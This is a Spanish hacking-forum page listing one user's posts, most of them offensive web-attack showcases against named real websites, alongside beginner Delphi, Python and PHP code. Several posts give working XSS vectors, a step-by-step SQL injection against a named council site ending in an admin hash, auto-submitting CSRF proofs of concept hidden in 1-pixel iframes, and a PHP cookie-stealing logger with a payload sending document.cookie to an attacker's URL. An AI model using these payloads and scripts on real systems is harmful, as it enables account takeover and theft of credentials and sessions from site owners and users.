Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Temas - Matabarras

Páginas: [1] 2
1
Bueno, estaba algo disgustado con pccomponentes y me fije en las afiliaciones.

http://afiliados.pccomponentes.com/registro.html
La cual utilizaremos para logear a effiliation y para registrarnos.


Bueno, sabia que esto estaba vinculado a una web francesa de afiliaciones, effiliation.com
Entonces dije bien no pasa nada de nombre y descripción pondre un simple vector en xss, "><img src=x onerror=prompt(2)>

Pondre un correo temporal usare emailtemporal.org y listo , por si hace falta confirmar algo.

Me encuentro que email temporal si recibe un correo con un vector xss , pum te lo ejecuta y ya..
En este caso no solo es por el vector si no porque el contenido se envia como html y nada ejecuta el html del correo, pero esto no es lo grave aunque en parte si

(Podemos detectar si se usa emailtemporal por su extension, y siempre que se use añadir un pequeño poc de redirección para obtener datos y infinitas cosas a el usuario que utilize ese correo asi que ya no es tonteria.)

Lo más grave de emailtemporal vendra luego..

Bueno algo que me encuentro de "camino" como aquel que dice, volvamos a effilation pero claro una vez me logeo con el nombre de usuario, NO mi nombre que es un vector xss, pues effiliation me refleja el xss cada vez que recargo la web, comente algo, haga lo que haga, a todos les reflejare mi XSS.



Si puse elladodelmal como sitio web a modo troll.


Tambien nos damos cuenta que en la  dirección de reenvío por omisión, si colocamos un vector xss tambien los ejecutara, oh my god esta web no filtrada nada(?).


Sisi, ni siquiera cuando colocas la contraseña nueva te la pone en asteriscos, ni siquiera eso..

Tambien obtenemos un CSRF en effiliation.com
http://www.effiliation.com/affiliev2/secure/profile.html?tab=identifiants

Para toda la gente que tenga cuenta en ella y este iniciada como ya sabeis con un CSRF podemos cambiar la clave, debido a que cuando realizas la petición no lleva ningun token, ni siquiera te pide que pongas la contraseña actual.

Tengo ganas de dormir y no e echo el poc, pero vamos que se hace en menos de 5 minutos, y si alguien lo quiere puedo hacerlo.

Que guay es una web donde se gana dinero por afiliaciones, pero nada aqui cualquiera puede usurpar la cuenta de cualquiera..

Claro podemos usurpar la cuenta, o directamente meterle un XSS en el dirección de reenvió por omisión y hacer uso de BEEF, no se que seria peor no?.


Está bastante claro que no ofrece protección alguna a los clientes , aparte de tener repleto de XSS Y CSRF, pudiendo cambiar tambien la cuenta bancaria y demas donde recibir el dinero..


Y voy a parar... porque me estoy empezando a cabrear  bastante, y no quiero hacer nada malo :D
 
Pero espera, emailtemporal  si tiene un xss seguro hay algo más, que petición hace cada vez que abro un mensaje?



Si efectivamente dicen borrar todos los mensajes, y demas , si quizas los borren pero tardaran bastante pues tengo más de 1954227 mensajes que puedo mirar ahora mismo, y siguiendo.. debido a una falta de verificación y si nos deja utilizar la acción de ver mensajes, tambien nos deja utilizar otras acciones y hay lo dejo.

Hasta aqui hemos llegado y espero que les haya gustado esta pequeña anecdota que de seguir seguro nunca acabaria.

PD: Al reportar ahora a emailtemporal, en el contacto si nos fijamos podemos bombardearle el contacto con el mismo mensaje todo el rato, pues se envia y no te muestra ningun captcha en ningun momento y puedes enviarlo las veces que quieras.

2
Hacking ShowOff / [IFXSS]Yourjavascript.com
« en: Junio 12, 2016, 10:15:30 pm »
Bueno aunque no es nada importante, mientras miraba unas cosas me lo vi y aqui lo dejo, y bueno el host es bastante util.


Vector: "<h1 onclick=alert("Matabarras")>

Reportado: Al correo de paypal de donaciones.

3
Back-end / Manual PHP Instructivo Okol.
« en: Junio 10, 2016, 10:47:29 am »
Les dejo aqui un manual que hizo Okol, hace unos años ya, para strikegeek que era un blog de sanko y mio pero que por  x motivos se dejo, no se si okol lo público alguna vez.



Descarga: https://www.sendspace.com/file/2q3ep1

Si el nombre es test.pdf, no recuerdo el porque lo tengo así en un disco duro  :o

4
Hacking ShowOff / XSS Thephonehouse
« en: Abril 05, 2016, 02:08:59 pm »
Quería comprar un móvil y ..


Vector: http://www.phonehouse.es/compra/carrito/ver.html?productadd=32136-%22%3E%3Cimg%20src=x%20onerror=confirm%28%27Matabarras%27%29;%3E

Reportado? Si
La encontre el 15 de marzo,pero al fin hoy vi que lo arreglaron.
Fixeado? Si.

Agradecimiento? No  :-\ :'(

5
Hacking ShowOff / [CSRF]Scanner Underc0de
« en: Febrero 29, 2016, 10:37:00 am »
Url: scanner.underc0de.org

Código: [Seleccionar]
<?php
//Codded: Matabarras
$url "scanner.underc0de.org"//url
//Parametros post que modificaremos :D
$form["password"] = ""//Dejamos el valor así debido a por defecto ya coge el valor del pwd.
$form["email"] = "[email protected]"//cambiamos el correo por el que queramos
$form["fname"] = "meaburro"//nombre
$form["lname"] = "vayavaya"//apellidos
$form["newsletter"] = 0//recibimos noticias 0 deshabilitado, 1 habilitado
$form["doupdate"] = "";
$form["processUser"] = 1;





echo 
'<html><body onLoad="document.csrf.submit();">';
echo 
'<form name="csrf" action="http://'.$url.'/ajax/controller.php" method="POST">';
foreach(
$form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo 
'</form></body></html>';
?>


Camuflar el csrf, easy.

Código: [Seleccionar]
// This code was coded by FrenetikK & Matabarras.


function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');

Index
Código: [Seleccionar]
<script src="a.js"></script>
Soluciones:

- Solución fácil desactivar que se tome por si la contraseña.
- Solución fácil utilizar un catpcha decente como recaptcha.
-Solución fácil utilizar un referer(esto aun así seria bypasseable).
-Solución correcta, utilizar un token para cada cuenta y para cada petición.

Reportado? Si
Fixeado? Si pero no adecuadamente.



6
Presentaciones / Xop Xop!
« en: Febrero 24, 2015, 10:21:38 am »
Hola! que tal todos, espero que bien les sigo leyendo siempre  ;D

7
Delphi / Anotadores en Delphi [Open Source]
« en: Octubre 12, 2014, 07:42:54 pm »
Aqui el de metal_kingdom , solo es abrirlo y se guarda solo.
Código: Delphi
  1. program anotator;
  2.  
  3. var
  4.   S: textfile;
  5.  
  6. begin
  7.   AssignFile(S, 'func.txt');
  8. {$I-} // No mostramos errores I/O para evitar msgboxes innecesarios.
  9.   append(S); // intentamos escribir en fichero existente.
  10. {$I+} // Vemos errores para comprobarlos
  11.   if IOResult <> 0 then // [0 = Fue bien] Si el resultado no fue bueno al comprobar entonces ..
  12.     rewrite(S); // si no se pudo entonces creamos archivo.
  13.   WriteLn(S, paramstr(0)); // escribimos ruta completa del archivo en nueva línea.
  14.   closefile(S); // cerramos archivo.
  15. end.

Aqui el que hice yo ya hace, lo hice para que se anotara al cliquear.
Código: Delphi
  1. unit Unit1;
  2.  
  3. interface
  4.  
  5. uses
  6.   Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  7.   Dialogs, StdCtrls;
  8.  
  9. type
  10.   TForm1 = class(TForm)
  11.     boton: TButton;
  12.     procedure botonClick(Sender: TObject);
  13.     procedure FormCreate(Sender: TObject);
  14.   private
  15.     { Private declarations }
  16.   public
  17.     { Public declarations }
  18.   end;
  19.  
  20. var
  21.   Form1: TForm1;
  22.   myFile : TextFile;
  23.   text   : string;
  24.   sFileName : string;
  25. implementation
  26.  
  27. {$R *.dfm}
  28.  
  29. procedure TForm1.botonClick(Sender: TObject);
  30. begin
  31. sFileName:= ExtractFileName(Application.ExeName);
  32.  
  33.  
  34.  
  35.    AssignFile(myFile, 'Funcionales.txt');
  36.    Append(myFile);
  37.  
  38.    WriteLn(myFile, sFileName);
  39.  
  40.    CloseFile(myFile);
  41.  
  42.    Reset(myFile);
  43.  
  44.    CloseFile(myFile);
  45.  end;
  46.  
  47. procedure TForm1.FormCreate(Sender: TObject);
  48. begin
  49.     AssignFile(myFile, 'Funcionales.txt');
  50.     ReWrite(myFile);
  51.     CloseFile(myFile);
  52. end;
  53.  
  54. end.

El codigo de metal_kingdom  es más corto,  y mejor.

Simplemente este post es una excusa para saludarles y espero que les vaya todo bien, saludos!  ;D

8
Bugs y Exploits / Bypassear FuckingScan[Mozilla Firefox]
« en: Abril 14, 2014, 01:19:13 pm »
Para la gente que no tiene scan, y necesita analizar muchas veces, aunque si esta bien que de vez en cuando no lo hagamos, ya que os da un scan gratuito por 1 solo click  ;D

PD: No es nada nuevo, ya muchos lo sabreis.

Nos instalamos el componente Grease Monkey https://addons.mozilla.org/es/firefox/addon/greasemonkey/

Una vez lo tenemos instalado, le añadimos el siguiente script.
http://userscripts.org:8080/scripts/source/118033.user.js
Entramos a la web, le damos a Enabled & Install y listo.(Sirve para más webs tipo adfly.)

Y hay más tipos de scripts  :)





9
Bugs y Exploits / CSRF Andromeda Botnet [ POC Change Password]
« en: Julio 27, 2013, 10:57:18 am »
Bueno despues de analizar la botnet Andromeda, despues de que la liberaran, (Podeis encontrarla aqui: http://www.indetectables.net/viewtopic.php?p=395956&sid=13cf3c88fc9560dba5bb5e6ed93c4b9b) despues de encuentrar varias vulnerabilidades, pero que es normal que esten, como xss y demás..

Ya que se supone que solo va a utilizar el panel el administrador, y para que va a quererse hacer daño así mismo?.

Pero hasta que encontre, el directorio donde cambiamos nuestra contraseña etc etc..

Y no chequea el toquen ni el reffer, así que supose que seria vulnerable y empeze a crear el poc.

Más alla de todo, lo dificil es encontrar la web y el directorio, aunque si nos infectamos y conocemos a la persona.., pues se la podemos colar no?.

Bien, para no hacer tan descarado como siempre que público un csrf, utilizo el JS siguiente para camuflar.

Código: [Seleccionar]
// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
document.write('');
}

writeIf('http://127.0.0.1/csrf.php');

Simplemente, si tenemos nuestro csrf subido a nuestra web: ahfiuahfa.com , y se llama csrf.php pues cambiamos el 127.0.0.1 por el de nuestra web sencillo no? xD.

Y en el index.html simplemente colocamos una redireccion hacia el JS. Supongamos que nuestro archivo se llama a.js.
Código: [Seleccionar]
<script src="a.js"></script>
Pues aqui el csrf,
Código: [Seleccionar]
<?php

//POC Change Password Andromeda Botnet
//codded: @Matabarras
$url "web";
$form['newlogin'] = "admin";
$form['newpass1'] = "admin";
$form['newpass2']= "admin";

echo 
'<html><body onLoad="document.csrf.submit();">';
echo 
'<form name="csrf" action="http://'.$url.'/nombredeldirectorio/?act=service&subact=logindata" method="POST">';

foreach(
$form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo 
'</form></body></html>';
?>

Una vez entren a la web que no se daran cuenta de nada gracias al JS.

Se le cambiara el usuario y contraseña y para acceder a la web simplemente pondremos en usuario Admin y en contraseña lo dejamos vacio.

Un saludo

10
Hacking / Sql Injection manualmente (Matabarras-Morenako)
« en: Julio 13, 2013, 09:36:21 am »


Texto escrito en el video:

Código: [Seleccionar]
Bueno soy Morenako-Matabarras y les voy a explicar como se realiza un ataque de Sql injecion manualmente.

En primer lugar vamos a la web a la que vamos a realizar la injección.

http://mostalocalcouncil.com/readnews.php?id=

En mi caso está.

Existe varios comentarios, /* -- #

ya que puede ser que con un comentario funcione y otro no.

y varias formas de realizarla, yo les explicare de una forma sencilla


Miraremos aver si es vulnerable facilmente con la tipica comilla simple.

Vemos que nos da el error así que empezemos.


Empezaremos con un - y una id de noticia el 1

y uniremos ya con +union+select+ o simplemente union select o /**/union/**/select/**/0

Hay diversas formas, con diversos comentarios, bueno.

Ahora lo que tenemos que hacer es añadir números hasta que nos desaparezca el error

Vale a partir de 4 nos ha desaparecido el error.

Entonces, ahora es cuando vamos a buscar las tablas de las basesdedatos.

Lo que haremos sera sustutir por uno de esos números por group_concat(table_name)

Una vez echo eso añadimos al final

+from+information_schema.tables -- - , ya que esto no es a ciegas

utilizamos el comentario -- o -- - al final de la consulta.


Vale aqui nos muestra todas las tablas, para mi la más importante y primera a mirar sera users, una cosa he de decirles

Quizas al sustituir el group_concat(table_name) por otro numero, no aparece nada por ejemplo

Por el 0 no nos aparece nada, si cambiamos el 1 por group_concat(table_name) si y si cambiamos el 2 también, es ir probando.

Bueno ya tenemos la tabla users que queremos mirar, así que vamos a transformar


http://mostalocalcouncil.com/readnews.php
?id=-1+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables -- -117,115,101,114,115

ahora esto lo ponemos por ,.

Vale, la injeccion de momento la tenemos así

http://mostalocalcouncil.com/readnews.php
?id=-1+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables -- -

Ahora lo que haremos es cambiar en group_concat(table_name) por group_concat(column_name)

y information_schema.tables por information_schema.columns y añadiremos


http://mostalocalcouncil.com/readnews.php?id=-1+union+select+0,1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(117,115,101,114,115) -- -

Y aparte de  cambiar eso, hemos añadido +where+table_name=char(aqui el codigo en ascii value que nos dio separado por comillas) -- -

Nos da varias columnas

yo mirare la de username y password
Asi que modificamos la consulta. y en group_concat(colum_name)

Column_name lo cambiamos por las columnas que queremos mirar separandolas por una coma y quitamos todo apartir de information_schema poniendo simplemente el nombre de la tabla, que miramos anteriormente que era USERS

http://mostalocalcouncil.com/readnews.php?id=-1+union+select+0,1,group_concat(username,password),3,4+from+users -- -

admin 68b752263e82b3b1ee1ffe739ee0eec1

Y ya tenemos el usuario y hash de la contraseña

Si queremos miramos el email tambien, y la id

vemos que su id es 2

Bueno,espero que les aña servido el tutorial y lo hayan entendido

Un cordial saludo

Morenako,Matabarras

11
Bugs y Exploits / Cross Site Request Forgery /Matabarras/
« en: Abril 27, 2013, 10:19:27 pm »
Buenas, hoy les explicare como explotamos una web con fallo de verificación en los tokens, lo que produce que podamos provocar acciones ilegitimas en nuestra "víctima" sin su cosentimiento ni conocimiento.

En este caso programe un CSRF; para la web ciudadhabbo, que simplemente, cuando el autor entra a nuestra web, automaticamente se le cambie el perfil de su hotel públicado, de la ID que indicamos.

También podriamos crear un CSRF, para públicar el hotel a base del que yo hice, muy sencillo.

Les dejo el tutorial donde explico los pasos.


CSRF:

Código: [Seleccionar]
<?php
//Codded: Matabarras/Morenako
// POC Cambio de Hotel Ciudadhabbo
$url "ciudadhabbo.com";
$form["id"] = 26//ID del hotel que queremos modificar
$form["nombre"] = "Murlocksito JUAPO";
$form["tipo"] = 1;
$form["name"] = "127.0.0.1";
$form["port"] = 80;
$form["web"] = "http://www.morenakomatabarras.com";
$form["info"] = "Pues probando a que si murlock";
$form["guardar"] = "Guardar+cambios";




echo 
'<html><body onLoad="document.csrf.submit();">';
echo 
'<form name="csrf" action="http://'.$url.'/doedit.php" method="POST">';
foreach(
$form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo 
'</form></body></html>';
?>



JS camuflando el csrf.
Código: [Seleccionar]
// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');

12
Hacking ShowOff / SQLI http://www.informaticovitoria.com
« en: Marzo 09, 2013, 12:05:40 pm »
Bueno despues de que me sigan en Twitter, me dio por mirar la web, dado que son 'informáticos' o así lo dice los titulos de su carrera.

Conclusión, acabe cabreado al observar que personas con carreras en la rama informática, dispongas de fallos tan comunes en sus sitios web.

Path vulnerable:
http://www.informaticovitoria.com/index.php?seccion=
-----------------------------------------------------------------------
http://www.informaticovitoria.com/index.php?seccion=noticia&id=1+union+select+1,2,3,4,5,6,7

Screenshot:


Estado: Explotable.
Reportado: Si(Sin respuesta todavía por parte de los administradores)
Fecha del hallazgo: 9-3-2013.
Autor: Matabarras.

13
Hacking ShowOff / XSS Pasiva/Persistente Somosprogramadores.com
« en: Diciembre 09, 2012, 12:17:21 pm »
Bueno, si nos dirijimos a un articulo de Somosprogramadores.

Por ejemplo el que use yo : http://www.somosprogramadores.com/articulo/58/anuncio-agenda-de-videotutoriales-para-html5-css3-y-php

Que pasa, que insertamos un comentario y en el usuario metemos un Vector de XSS ,  y al comentar , bam! Nos imprime el vector XSS No lo filra.

Pero si recargamos la web, el vector se filtra.

Vale, hasta hay esto es 'pasivo'.

Pero que pasa, cuando otro usuario comenta en el articulo donde yo antés inserte mi vector XSS¿?
Esto:


Entoncés pasa a ser persistente.

Saludos   ;)

14
Python / Mi primer script en Python.
« en: Diciembre 09, 2012, 09:25:39 am »
Bueno hace nada, que leo algo de Python por culpa del gay de Sanko  ???

La cosa, esque los operadores son los mismos en casi todos los lenguajes, y se me hizo facilisimo, aprender lo basico de lo basico de lo basico¿? de Python .

Así que les dejo esta shit, como un empiezo (Como podreis observar, no lleva ni excepcionés.)
Código: Python
  1. #!/usr/bin/python
  2. #Shit calculadora, mi primer script en Python..
  3. # 8-12-12 ..
  4. #@Matabarras
  5.  
  6. import sys,webbrowser
  7.  
  8.  
  9. print '''
  10. ===================================
  11.       Calculadora Shit          
  12.       Mi primer script en  Python    
  13.       @Matabarras        
  14. ===================================
  15. '''
  16.  
  17.    
  18. print "Calculadora Shit"
  19. print "Sumar"
  20. print "Restar"
  21. print "Dividir"
  22. print "DivisionEntera"
  23. print "Multiplicar"
  24. print "Exponente"
  25. print "Salir"
  26.  
  27. calculadorashit = raw_input("Elige la opcion que quieras : ")
  28. if calculadorashit == "Salir":
  29.     sys.exit()
  30. else:
  31.     primero = int( raw_input("Primer numero: "))
  32.     segundo = int( raw_input("Segundo numero: "))
  33. if calculadorashit == "Sumar":
  34.     resultado = primero + segundo  
  35.  
  36.  
  37. if calculadorashit == "Restar":
  38.     resultado = primero - segundo
  39.    
  40. if calculadorashit == "Dividir":
  41.     resultado = primero / segundo
  42. if calculadorashit == "Multiplicar":
  43.     resultado = primero * segundo
  44.    
  45. if calculadorashit == "Exponente":
  46.     resultado = primero ** segundo
  47.  
  48. if calculadorashit == "DivisionEntera":
  49.     resultado = primero // segundo
  50.  
  51. print "El resultado es " + str(resultado)
  52.  
  53. salir = raw_input("Quieres visitar mi Twiteer?: ")
  54.  
  55.  
  56. if salir == "si":
  57.    
  58.     matabarras = webbrowser.Mozilla('firefox')
  59.     matabarras.open_new('www.twitter.com/@matabarras')
  60.    
  61. elif salir == "no":
  62.     print raw_input("Gracias por usar la calculadora..")
  63.     sys.exit()
  64.    
  65.  
  66. else:
  67.     sys.exit()
  68.  

15
Hacking / Metasploit Payload Reverse_TCP [Meterpreter]
« en: Noviembre 24, 2012, 01:15:03 pm »
Aqui les dejo un tutorial, donde explico como utilizar el payload reverse_tcp, contra un windows XP.
Abriendo una sesión de meterpreter.

16
Hacking / Instalación de Metasploit Framework 4.0 [Linux]
« en: Noviembre 24, 2012, 01:13:57 pm »
Bueno, aqui les dejo un tutorial donde sin más lo explico como instalar metasploit.

Son tutoriales, que hice en su momento, y ahora me dan algo de nostalgia jaja.

17
Back-end / PHP Explicación sentencia IF y ELSE y Bucle While.
« en: Noviembre 24, 2012, 12:50:52 pm »
Sin más aqui les dejo mis dos videos :)

Explicación sentencia IF  / ELSE .



Explicación Bucle While:


Saludos.

18
Back-end / Tutorial Formularios POST-GET con Arrays predifinidos.
« en: Noviembre 24, 2012, 12:44:42 pm »
Bueno, aqui otro tutorial que hice,hace casi un año.

Esta dividido en 2 Partes, y con voz también.

Parte 1:


Parte 2:

19
Bueno voy a postear, unos tutoriales sobre PHP, que hice alredredor de 1 año, y creo que estan bien explicados para que la gente lo entienda.


(PD: La voz me ha cambiado jaaaaaaa.., aun era peque hay xD )

Sin más aqui el video explicativo.


Duración 14:07.

20
Back-end / Robo de Cookies & IP & ISP
« en: Julio 07, 2012, 06:16:51 am »
Código: PHP
  1. <?php
  2.  
  3. if(isset($_GET["leer"])) {
  4.  
  5. $read = file_get_contents("cookie.txt");
  6. echo $read;
  7.  
  8. } else {
  9. $cookie = $_GET["cookie"];
  10. $texto = "Ip: ".$_SERVER["REMOTE_ADDR"] . " - ISP : ".gethostbyaddr($_SERVER["REMOTE_ADDR"])." - Fecha: ".date("H:i:s d/m/Y")." - Cookie: ".$cookie."<br>";
  11. $l = file_get_contents("cookie.txt");
  12. file_put_contents("cookie.txt",$texto.$l);
  13. }
  14. ?>


Esto es util cuando cogemos una xss, y la explotamos por ejemplo:
<script>location.href=\'http://urldetuweb.com/fichero.php?cooke=\'+document .cookie;</script>

Páginas: [1] 2